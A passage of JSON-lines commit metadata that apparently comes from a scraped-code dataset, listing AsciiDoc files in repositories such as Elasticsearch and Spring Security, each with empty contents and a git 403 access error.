2017-08-12-Capture-Outgoing-httphttps-Request-from-web-Application-hosted-on-Azure-App-Service.adoc","repos":"fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io,fasigpt\/fasigpt.github.io","old_file":"_posts\/2017-08-12-Capture-Outgoing-httphttps-Request-from-web-Application-hosted-on-Azure-App-Service.adoc","new_file":"_posts\/2017-08-12-Capture-Outgoing-httphttps-Request-from-web-Application-hosted-on-Azure-App-Service.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fasigpt\/fasigpt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9781bd069e3cc8f0f432fdbf717bf46d6ae01f0","subject":"Fix broken regex in doc tests","message":"Fix broken regex in doc tests\n\nRegexes are 
hard.\n","repos":"qwerty4030\/elasticsearch,a2lin\/elasticsearch,rlugojr\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,MisterAndersen\/elasticsearch,liweinan0423\/elasticsearch,JackyMai\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wuranbo\/elasticsearch,kalimatas\/elasticsearch,wenpos\/elasticsearch,LewayneNaidoo\/elasticsearch,mikemccand\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,MaineC\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,rlugojr\/elasticsearch,pozhidaevak\/elasticsearch,JervyShi\/elasticsearch,JackyMai\/elasticsearch,IanvsPoplicola\/elasticsearch,jprante\/elasticsearch,gmarz\/elasticsearch,Shepard1212\/elasticsearch,LewayneNaidoo\/elasticsearch,henakamaMSFT\/elasticsearch,wenpos\/elasticsearch,mortonsykes\/elasticsearch,artnowo\/elasticsearch,gfyoung\/elasticsearch,scottsom\/elasticsearch,kalimatas\/elasticsearch,nezirus\/elasticsearch,winstonewert\/elasticsearch,maddin2016\/elasticsearch,LewayneNaidoo\/elasticsearch,scottsom\/elasticsearch,kalimatas\/elasticsearch,Stacey-Gammon\/elasticsearch,shreejay\/elasticsearch,rajanm\/elasticsearch,GlenRSmith\/elasticsearch,masaruh\/elasticsearch,uschindler\/elasticsearch,s1monw\/elasticsearch,fforbeck\/elasticsearch,jprante\/elasticsearch,brandonkearby\/elasticsearch,gingerwizard\/elasticsearch,bawse\/elasticsearch,LeoYao\/elasticsearch,yanjunh\/elasticsearch,C-Bish\/elasticsearch,wangtuo\/elasticsearch,IanvsPoplicola\/elasticsearch,fernandozhu\/elasticsearch,robin13\/elasticsearch,scottsom\/elasticsearch,jimczi\/elasticsearch,mohit\/elasticsearch,qwerty4030\/elasticsearch,a2lin\/elasticsearch,wuranbo\/elasticsearch,glefloch\/elasticsearch,liweinan0423\/elasticsearch,ZTE-PaaS\/elasticsearch,JSCooke\/elasticsearch,yanjunh\/elasticsearch,fernandozhu\/elasticsearch,brandonkearby\/elasticsearch,JSCooke\/elasticsearch,alexshadow007\/elasticsearch,nilabhsagar\/elasticsearch,artnowo\/elasticsearch,masaruh\/elasticsearch,vroyer\/elassandra,s1monw\/elasticsearch,JackyMai\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,bawse\/elasticsearch,gingerwizard\/elasticsearch,spiegela\/elasticsearch,geidies\/elasticsearch,Stacey-Gammon\/elasticsearch,gfyoung\/elasticsearch,uschindler\/elasticsearch,JackyMai\/elasticsearch,spiegela\/elasticsearch,winstonewert\/elasticsearch,fforbeck\/elasticsearch,a2lin\/elasticsearch,vroyer\/elasticassandra,maddin2016\/elasticsearch,markwalkom\/elasticsearch,liweinan0423\/elasticsearch,LewayneNaidoo\/elasticsearch,C-Bish\/elasticsearch,naveenhooda2000\/elasticsearch,mortonsykes\/elasticsearch,vroyer\/elassandra,lks21c\/elasticsearch,jprante\/elasticsearch,geidies\/elasticsearch,lks21c\/elasticsearch,winstonewert\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,jimczi\/elasticsearch,naveenhooda2000\/elasticsearch,bawse\/elasticsearch,glefloch\/elasticsearch,gmarz\/elasticsearch,markwalkom\/elasticsearch,nazarewk\/elasticsearch,Helen-Zhao\/elasticsearch,mikemccand\/elasticsearch,rlugojr\/elasticsearch,artnowo\/elasticsearch,geidies\/elasticsearch,JervyShi\/elasticsearch,qwerty4030\/elasticsearch,i-am-Nathan\/elasticsearch,coding0011\/elasticsearch,liweinan0423\/elasticsearch,HonzaKral\/elasticsearch,nilabhsagar\/elasticsearch,Shepard1212\/elasticsearch,scorpionvicky\/elasticsearch,gmarz\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,LeoYao\/elasticsearch,njlawton\/elasticsearch,mortonsykes\/elasticsearch,MaineC\/elasticsearch,wuranbo\/elasticsearch,JSCooke\/elasticsearch,artnowo\/elas
ticsearch,naveenhooda2000\/elasticsearch,a2lin\/elasticsearch,nezirus\/elasticsearch,MisterAndersen\/elasticsearch,brandonkearby\/elasticsearch,alexshadow007\/elasticsearch,jimczi\/elasticsearch,robin13\/elasticsearch,StefanGor\/elasticsearch,njlawton\/elasticsearch,nezirus\/elasticsearch,gmarz\/elasticsearch,strapdata\/elassandra,MaineC\/elasticsearch,gfyoung\/elasticsearch,rajanm\/elasticsearch,yanjunh\/elasticsearch,mjason3\/elasticsearch,wangtuo\/elasticsearch,Helen-Zhao\/elasticsearch,JackyMai\/elasticsearch,MaineC\/elasticsearch,geidies\/elasticsearch,wenpos\/elasticsearch,scottsom\/elasticsearch,uschindler\/elasticsearch,brandonkearby\/elasticsearch,mjason3\/elasticsearch,shreejay\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,fernandozhu\/elasticsearch,LewayneNaidoo\/elasticsearch,elasticdog\/elasticsearch,brandonkearby\/elasticsearch,pozhidaevak\/elasticsearch,wangtuo\/elasticsearch,C-Bish\/elasticsearch,wangtuo\/elasticsearch,maddin2016\/elasticsearch,obourgain\/elasticsearch,nilabhsagar\/elasticsearch,fernandozhu\/elasticsearch,rajanm\/elasticsearch,robin13\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,alexshadow007\/elasticsearch,mohit\/elasticsearch,GlenRSmith\/elasticsearch,mohit\/elasticsearch,IanvsPoplicola\/elasticsearch,HonzaKral\/elasticsearch,s1monw\/elasticsearch,StefanGor\/elasticsearch,scottsom\/elasticsearch,strapdata\/elassandra,wangtuo\/elasticsearch,Stacey-Gammon\/elasticsearch,fforbeck\/elasticsearch,Shepard1212\/elasticsearch,nazarewk\/elasticsearch,pozhidaevak\/elasticsearch,LeoYao\/elasticsearch,StefanGor\/elasticsearch,mikemccand\/elasticsearch,spiegela\/elasticsearch,mortonsykes\/elasticsearch,fred84\/elasticsearch,s1monw\/elasticsearch,mjason3\/elasticsearch,sneivandt\/elasticsearch,MaineC\/elasticsearch,JervyShi\/elasticsearch,coding0011\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,mortonsykes\/elasticsearch,LeoYao\/elasticsearch,markwalkom\/elasticsearch,nilabhsagar\/elasticsearch,robin13\/elasticsearch,ZTE-PaaS\/elasticsearch,geidies\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,alexshadow007\/elasticsearch,HonzaKral\/elasticsearch,JervyShi\/elasticsearch,fred84\/elasticsearch,artnowo\/elasticsearch,StefanGor\/elasticsearch,bawse\/elasticsearch,glefloch\/elasticsearch,C-Bish\/elasticsearch,njlawton\/elasticsearch,jimczi\/elasticsearch,fforbeck\/elasticsearch,obourgain\/elasticsearch,henakamaMSFT\/elasticsearch,alexshadow007\/elasticsearch,MisterAndersen\/elasticsearch,gingerwizard\/elasticsearch,henakamaMSFT\/elasticsearch,GlenRSmith\/elasticsearch,vroyer\/elasticassandra,ZTE-PaaS\/elasticsearch,Helen-Zhao\/elasticsearch,IanvsPoplicola\/elasticsearch,i-am-Nathan\/elasticsearch,obourgain\/elasticsearch,glefloch\/elasticsearch,gfyoung\/elasticsearch,winstonewert\/elasticsearch,lks21c\/elasticsearch,a2lin\/elasticsearch,Helen-Zhao\/elasticsearch,rlugojr\/elasticsearch,pozhidaevak\/elasticsearch,fred84\/elasticsearch,obourgain\/elasticsearch,Shepard1212\/elasticsearch,strapdata\/elassandra,LeoYao\/elasticsearch,fforbeck\/elasticsearch,bawse\/elasticsearch,mohit\/elasticsearch,uschindler\/elasticsearch,jprante\/elasticsearch,i-am-Nathan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,i-am-Nathan\/elasticsearch,umeshdangat\/elasticsearch,wuranbo\/elasticsearch,umeshdangat\/elasticsearch,elasticdog\/elasticsearch,mjason3\/elasticsearch,ZTE-PaaS\/elasticsearch,qwerty4030\/elasticsearch,henakamaMSFT\/elasticsearch,elasticdog\/elasticsearch,nezirus\/elasticsea
rch,gingerwizard\/elasticsearch,strapdata\/elassandra,Shepard1212\/elasticsearch,jimczi\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,shreejay\/elasticsearch,umeshdangat\/elasticsearch,nknize\/elasticsearch,markwalkom\/elasticsearch,lks21c\/elasticsearch,sneivandt\/elasticsearch,glefloch\/elasticsearch,sneivandt\/elasticsearch,gingerwizard\/elasticsearch,s1monw\/elasticsearch,wuranbo\/elasticsearch,spiegela\/elasticsearch,JervyShi\/elasticsearch,scorpionvicky\/elasticsearch,nazarewk\/elasticsearch,kalimatas\/elasticsearch,naveenhooda2000\/elasticsearch,masaruh\/elasticsearch,MisterAndersen\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,shreejay\/elasticsearch,pozhidaevak\/elasticsearch,IanvsPoplicola\/elasticsearch,nezirus\/elasticsearch,uschindler\/elasticsearch,yanjunh\/elasticsearch,HonzaKral\/elasticsearch,masaruh\/elasticsearch,JSCooke\/elasticsearch,elasticdog\/elasticsearch,nknize\/elasticsearch,umeshdangat\/elasticsearch,spiegela\/elasticsearch,yanjunh\/elasticsearch,njlawton\/elasticsearch,mikemccand\/elasticsearch,robin13\/elasticsearch,nazarewk\/elasticsearch,maddin2016\/elasticsearch,njlawton\/elasticsearch,elasticdog\/elasticsearch,coding0011\/elasticsearch,markwalkom\/elasticsearch,geidies\/elasticsearch,mohit\/elasticsearch,MisterAndersen\/elasticsearch,fred84\/elasticsearch,vroyer\/elasticassandra,JervyShi\/elasticsearch,sneivandt\/elasticsearch,nazarewk\/elasticsearch,Stacey-Gammon\/elasticsearch,mikemccand\/elasticsearch,mjason3\/elasticsearch,obourgain\/elasticsearch,Helen-Zhao\/elasticsearch,markwalkom\/elasticsearch,nilabhsagar\/elasticsearch,jprante\/elasticsearch,C-Bish\/elasticsearch,JSCooke\/elasticsearch,Stacey-Gammon\/elasticsearch,fernandozhu\/elasticsearch,LeoYao\/elasticsearch,StefanGor\/elasticsearch,wenpos\/elasticsearch,winstonewert\/elasticsearch,lks21c\/elasticsearch,GlenRSmith\/elasticsearch,wenpos\/elasticsearch,masaruh\/elasticsearch,coding0011\/elasticsearch,ZTE-PaaS\/elasticsearch,rlugojr\/elasticsearch,strapdata\/elassandra,liweinan0423\/elasticsearch,vroyer\/elassandra,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,gmarz\/elasticsearch,henakamaMSFT\/elasticsearch,i-am-Nathan\/elasticsearch","old_file":"docs\/reference\/cat\/allocation.asciidoc","new_file":"docs\/reference\/cat\/allocation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"14cf8b1701373579479c302d2d402d3e2b9e4163","subject":"zynq-boot now includes kernel modules, so moved kernel build instructions to a separate doc","message":"zynq-boot now includes kernel modules, so moved kernel build instructions to a separate doc\n\nChange-Id: I2e9ac44e43cc406633afefbefbee71ea2bf1966e\n","repos":"hanw\/connectal,chenm001\/connectal,hanw\/connectal,hanw\/connectal,8l\/connectal,cambridgehackers\/connectal,8l\/connectal,8l\/connectal,csail-csg\/connectal,cambridgehackers\/connectal,csail-csg\/connectal,hanw\/connectal,chenm001\/connectal,chenm001\/connectal,hanw\/connectal,csail-csg\/connectal,cambridgehackers\/connectal,cambridgehackers\/connectal,8l\/connectal,chenm001\/connectal,chenm001\/connectal,csail-csg\/connectal,8l\/connectal,csail-csg\/connectal,cambridgehackers\/connectal","old_file":"doc\/zynq-portal-driver.asciidoc","new_file":"doc\/zynq-portal-driver.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/csail-csg\/connectal.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be8cc06e236841cf9aa7813072170408382c2ebf","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Forensics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c95a6b0db0e34974e41190ae3f3b43d609fdafac","subject":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","message":"Update 2016-04-05-Llamada-para-el-sistema-operativo.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_file":"_posts\/2016-04-05-Llamada-para-el-sistema-operativo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7a8a6dd70f866d22d6430df6ccacbf4d7ec4d1aa","subject":"Update 2015-02-06-the-blog-update.adoc","message":"Update 2015-02-06-the-blog-update.adoc","repos":"deepwind\/deepwind.github.io,deepwind\/deepwind.github.io,deepwind\/deepwind.github.io","old_file":"_posts\/2015-02-06-the-blog-update.adoc","new_file":"_posts\/2015-02-06-the-blog-update.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/deepwind\/deepwind.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2efc4b036ff57b90f8d817bc2f84e87edd936e27","subject":"Update 2015-09-29-That-was-my-jam.adoc","message":"Update 2015-09-29-That-was-my-jam.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_file":"_posts\/2015-09-29-That-was-my-jam.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"219bef77f79c1784f42da3538f6e40385eceadcf","subject":"Update 2017-02-20-A-New-Obsession.adoc","message":"Update 2017-02-20-A-New-Obsession.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-02-20-A-New-Obsession.adoc","new_file":"_posts\/2017-02-20-A-New-Obsession.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0bcc607a2a74bd09621f7e4910f2a9b878678275","subject":"Update 2017-05-31-Your-Blog-title.adoc","message":"Update 
2017-05-31-Your-Blog-title.adoc","repos":"itsallanillusion\/itsallanillusion.github.io,itsallanillusion\/itsallanillusion.github.io,itsallanillusion\/itsallanillusion.github.io,itsallanillusion\/itsallanillusion.github.io","old_file":"_posts\/2017-05-31-Your-Blog-title.adoc","new_file":"_posts\/2017-05-31-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/itsallanillusion\/itsallanillusion.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"60adb708b93ec491066d595622d4a1eabe704fef","subject":":memo: gh-pages favicon","message":":memo: gh-pages favicon\n","repos":"syon\/refills","old_file":"src\/refills\/github-pages\/favicon.adoc","new_file":"src\/refills\/github-pages\/favicon.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/syon\/refills.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"78faf7a5a03a94b7c1900c8da985dbda464f0345","subject":"Update 2017-03-28-Your-Blog-title.adoc","message":"Update 2017-03-28-Your-Blog-title.adoc","repos":"codekiemcom\/codekiemcom.github.io","old_file":"_posts\/2017-03-28-Your-Blog-title.adoc","new_file":"_posts\/2017-03-28-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/codekiemcom\/codekiemcom.github.io.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"7ff9c6a8ff3b6bfabedd1f369a8178e3498407a0","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f49201c693676e039fd060a72b84e3d0acdb4186","subject":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","message":"Update 2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_file":"_posts\/2016-11-08-webpack-typescript-resolve-index-module-not-found-error-cannot-resolve-file-or-directory.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ea95cc3a326cbe783debead5a5ae4e4ff78c7da","subject":"SEC-2094: Document Concurrency Support","message":"SEC-2094: Document Concurrency 
Support\n","repos":"zshift\/spring-security,fhanik\/spring-security,spring-projects\/spring-security,diegofernandes\/spring-security,jmnarloch\/spring-security,SanjayUser\/SpringSecurityPro,diegofernandes\/spring-security,ollie314\/spring-security,panchenko\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,kazuki43zoo\/spring-security,djechelon\/spring-security,vitorgv\/spring-security,zshift\/spring-security,caiwenshu\/spring-security,pkdevbox\/spring-security,hippostar\/spring-security,adairtaosy\/spring-security,MatthiasWinzeler\/spring-security,MatthiasWinzeler\/spring-security,zgscwjm\/spring-security,caiwenshu\/spring-security,adairtaosy\/spring-security,vitorgv\/spring-security,thomasdarimont\/spring-security,chinazhaoht\/spring-security,xingguang2013\/spring-security,follow99\/spring-security,jmnarloch\/spring-security,ajdinhedzic\/spring-security,driftman\/spring-security,wkorando\/spring-security,raindev\/spring-security,djechelon\/spring-security,ractive\/spring-security,spring-projects\/spring-security,mparaz\/spring-security,pwheel\/spring-security,forestqqqq\/spring-security,Xcorpio\/spring-security,pkdevbox\/spring-security,likaiwalkman\/spring-security,izeye\/spring-security,forestqqqq\/spring-security,zhaoqin102\/spring-security,hippostar\/spring-security,eddumelendez\/spring-security,rwinch\/spring-security,mrkingybc\/spring-security,chinazhaoht\/spring-security,fhanik\/spring-security,MatthiasWinzeler\/spring-security,rwinch\/spring-security,SanjayUser\/SpringSecurityPro,cyratech\/spring-security,liuguohua\/spring-security,spring-projects\/spring-security,diegofernandes\/spring-security,thomasdarimont\/spring-security,eddumelendez\/spring-security,rwinch\/spring-security,fhanik\/spring-security,tekul\/spring-security,SanjayUser\/SpringSecurityPro,hippostar\/spring-security,likaiwalkman\/spring-security,ajdinhedzic\/spring-security,ajdinhedzic\/spring-security,jgrandja\/spring-security,mparaz\/spring-security,adairtaosy\/spring-security,mparaz\/spring-security,liuguohua\/spring-security,wilkinsona\/spring-security,panchenko\/spring-security,rwinch\/spring-security,zgscwjm\/spring-security,tekul\/spring-security,cyratech\/spring-security,pkdevbox\/spring-security,Krasnyanskiy\/spring-security,panchenko\/spring-security,ollie314\/spring-security,likaiwalkman\/spring-security,mounb\/spring-security,ractive\/spring-security,ollie314\/spring-security,raindev\/spring-security,kazuki43zoo\/spring-security,pwheel\/spring-security,Peter32\/spring-security,izeye\/spring-security,olezhuravlev\/spring-security,kazuki43zoo\/spring-security,ractive\/spring-security,xingguang2013\/spring-security,djechelon\/spring-security,eddumelendez\/spring-security,wkorando\/spring-security,pwheel\/spring-security,mrkingybc\/spring-security,wilkinsona\/spring-security,xingguang2013\/spring-security,vitorgv\/spring-security,chinazhaoht\/spring-security,follow99\/spring-security,vitorgv\/spring-security,yinhe402\/spring-security,spring-projects\/spring-security,caiwenshu\/spring-security,cyratech\/spring-security,olezhuravlev\/spring-security,jgrandja\/spring-security,forestqqqq\/spring-security,SanjayUser\/SpringSecurityPro,driftman\/spring-security,Peter32\/spring-security,zshift\/spring-security,raindev\/spring-security,liuguohua\/spring-security,Xcorpio\/spring-security,thomasdarimont\/spring-security,Xcorpio\/spring-security,chinazhaoht\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,mrkingybc\/spring-security,djechelon\/spring-security,mdeinum\/spring-
security,ollie314\/spring-security,cyratech\/spring-security,Krasnyanskiy\/spring-security,pwheel\/spring-security,fhanik\/spring-security,Krasnyanskiy\/spring-security,thomasdarimont\/spring-security,yinhe402\/spring-security,kazuki43zoo\/spring-security,mounb\/spring-security,zhaoqin102\/spring-security,tekul\/spring-security,SanjayUser\/SpringSecurityPro,driftman\/spring-security,follow99\/spring-security,jmnarloch\/spring-security,xingguang2013\/spring-security,panchenko\/spring-security,mdeinum\/spring-security,olezhuravlev\/spring-security,caiwenshu\/spring-security,izeye\/spring-security,likaiwalkman\/spring-security,wilkinsona\/spring-security,fhanik\/spring-security,jmnarloch\/spring-security,adairtaosy\/spring-security,mdeinum\/spring-security,jgrandja\/spring-security,kazuki43zoo\/spring-security,mdeinum\/spring-security,izeye\/spring-security,MatthiasWinzeler\/spring-security,spring-projects\/spring-security,ajdinhedzic\/spring-security,forestqqqq\/spring-security,wilkinsona\/spring-security,follow99\/spring-security,wkorando\/spring-security,wkorando\/spring-security,rwinch\/spring-security,Peter32\/spring-security,olezhuravlev\/spring-security,djechelon\/spring-security,pkdevbox\/spring-security,Xcorpio\/spring-security,zhaoqin102\/spring-security,yinhe402\/spring-security,mounb\/spring-security,yinhe402\/spring-security,zhaoqin102\/spring-security,Peter32\/spring-security,zgscwjm\/spring-security,raindev\/spring-security,fhanik\/spring-security,eddumelendez\/spring-security,eddumelendez\/spring-security,mrkingybc\/spring-security,Krasnyanskiy\/spring-security,olezhuravlev\/spring-security,mounb\/spring-security,mparaz\/spring-security,spring-projects\/spring-security,hippostar\/spring-security,diegofernandes\/spring-security,jgrandja\/spring-security,driftman\/spring-security,zshift\/spring-security,ractive\/spring-security,thomasdarimont\/spring-security,liuguohua\/spring-security,pwheel\/spring-security,zgscwjm\/spring-security,tekul\/spring-security","old_file":"docs\/manual\/src\/asciidoctor\/index.adoc","new_file":"docs\/manual\/src\/asciidoctor\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"879016df6badda0ad10117be72763c2d7e8ef03b","subject":"Publish 2016-6-26-PHPER-array-merge.adoc","message":"Publish 2016-6-26-PHPER-array-merge.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-26-PHPER-array-merge.adoc","new_file":"2016-6-26-PHPER-array-merge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32b5ce3ad7cb1245539dc737946c4a641825b862","subject":"CL note - Calculate MD5 hash","message":"CL note - Calculate MD5 hash\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5d53f5f7db1eb38b4e2a51bf90d020c81a03de32","subject":"Correct ASCIIDoc markup","message":"Correct ASCIIDoc 
markup\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"693da9d1726069e8c9ea73133ff2f94b247d608d","subject":"Update 2015-02-16-Build-API-Docs-for-the-RHQ-Project.adoc","message":"Update 2015-02-16-Build-API-Docs-for-the-RHQ-Project.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2015-02-16-Build-API-Docs-for-the-RHQ-Project.adoc","new_file":"_posts\/2015-02-16-Build-API-Docs-for-the-RHQ-Project.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fcadc2cb6ff9fcea09699a436bcec2098dfd9f4","subject":"Update 2017-03-26-Fuck-yeah.adoc","message":"Update 2017-03-26-Fuck-yeah.adoc","repos":"AgustinQuetto\/AgustinQuetto.github.io","old_file":"_posts\/2017-03-26-Fuck-yeah.adoc","new_file":"_posts\/2017-03-26-Fuck-yeah.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AgustinQuetto\/AgustinQuetto.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d56b130eae7a00701935e5be464868f90a0be83","subject":"Add files via upload","message":"Add files via upload\n\nAdd multitier to v3 branch","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/aws-multitier.adoc","new_file":"userguide\/tutorials\/aws-multitier.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ec44f65ca182e037eac40a356ebd157c370965a4","subject":"adding workshop-prereqs into resources section","message":"adding workshop-prereqs into resources section\n","repos":"dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop","old_file":"resources\/workshop-prereqs.adoc","new_file":"resources\/workshop-prereqs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"37f01fb72eb11fa9fb0d313df89d0a43aed7a6b2","subject":"Added jmh test results (#595)","message":"Added jmh test results (#595)\n\n","repos":"orange-buffalo\/dozer,garethahealy\/dozer,DozerMapper\/dozer,garethahealy\/dozer,DozerMapper\/dozer,orange-buffalo\/dozer","old_file":"tests\/dozer-jmh-tests\/results.adoc","new_file":"tests\/dozer-jmh-tests\/results.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
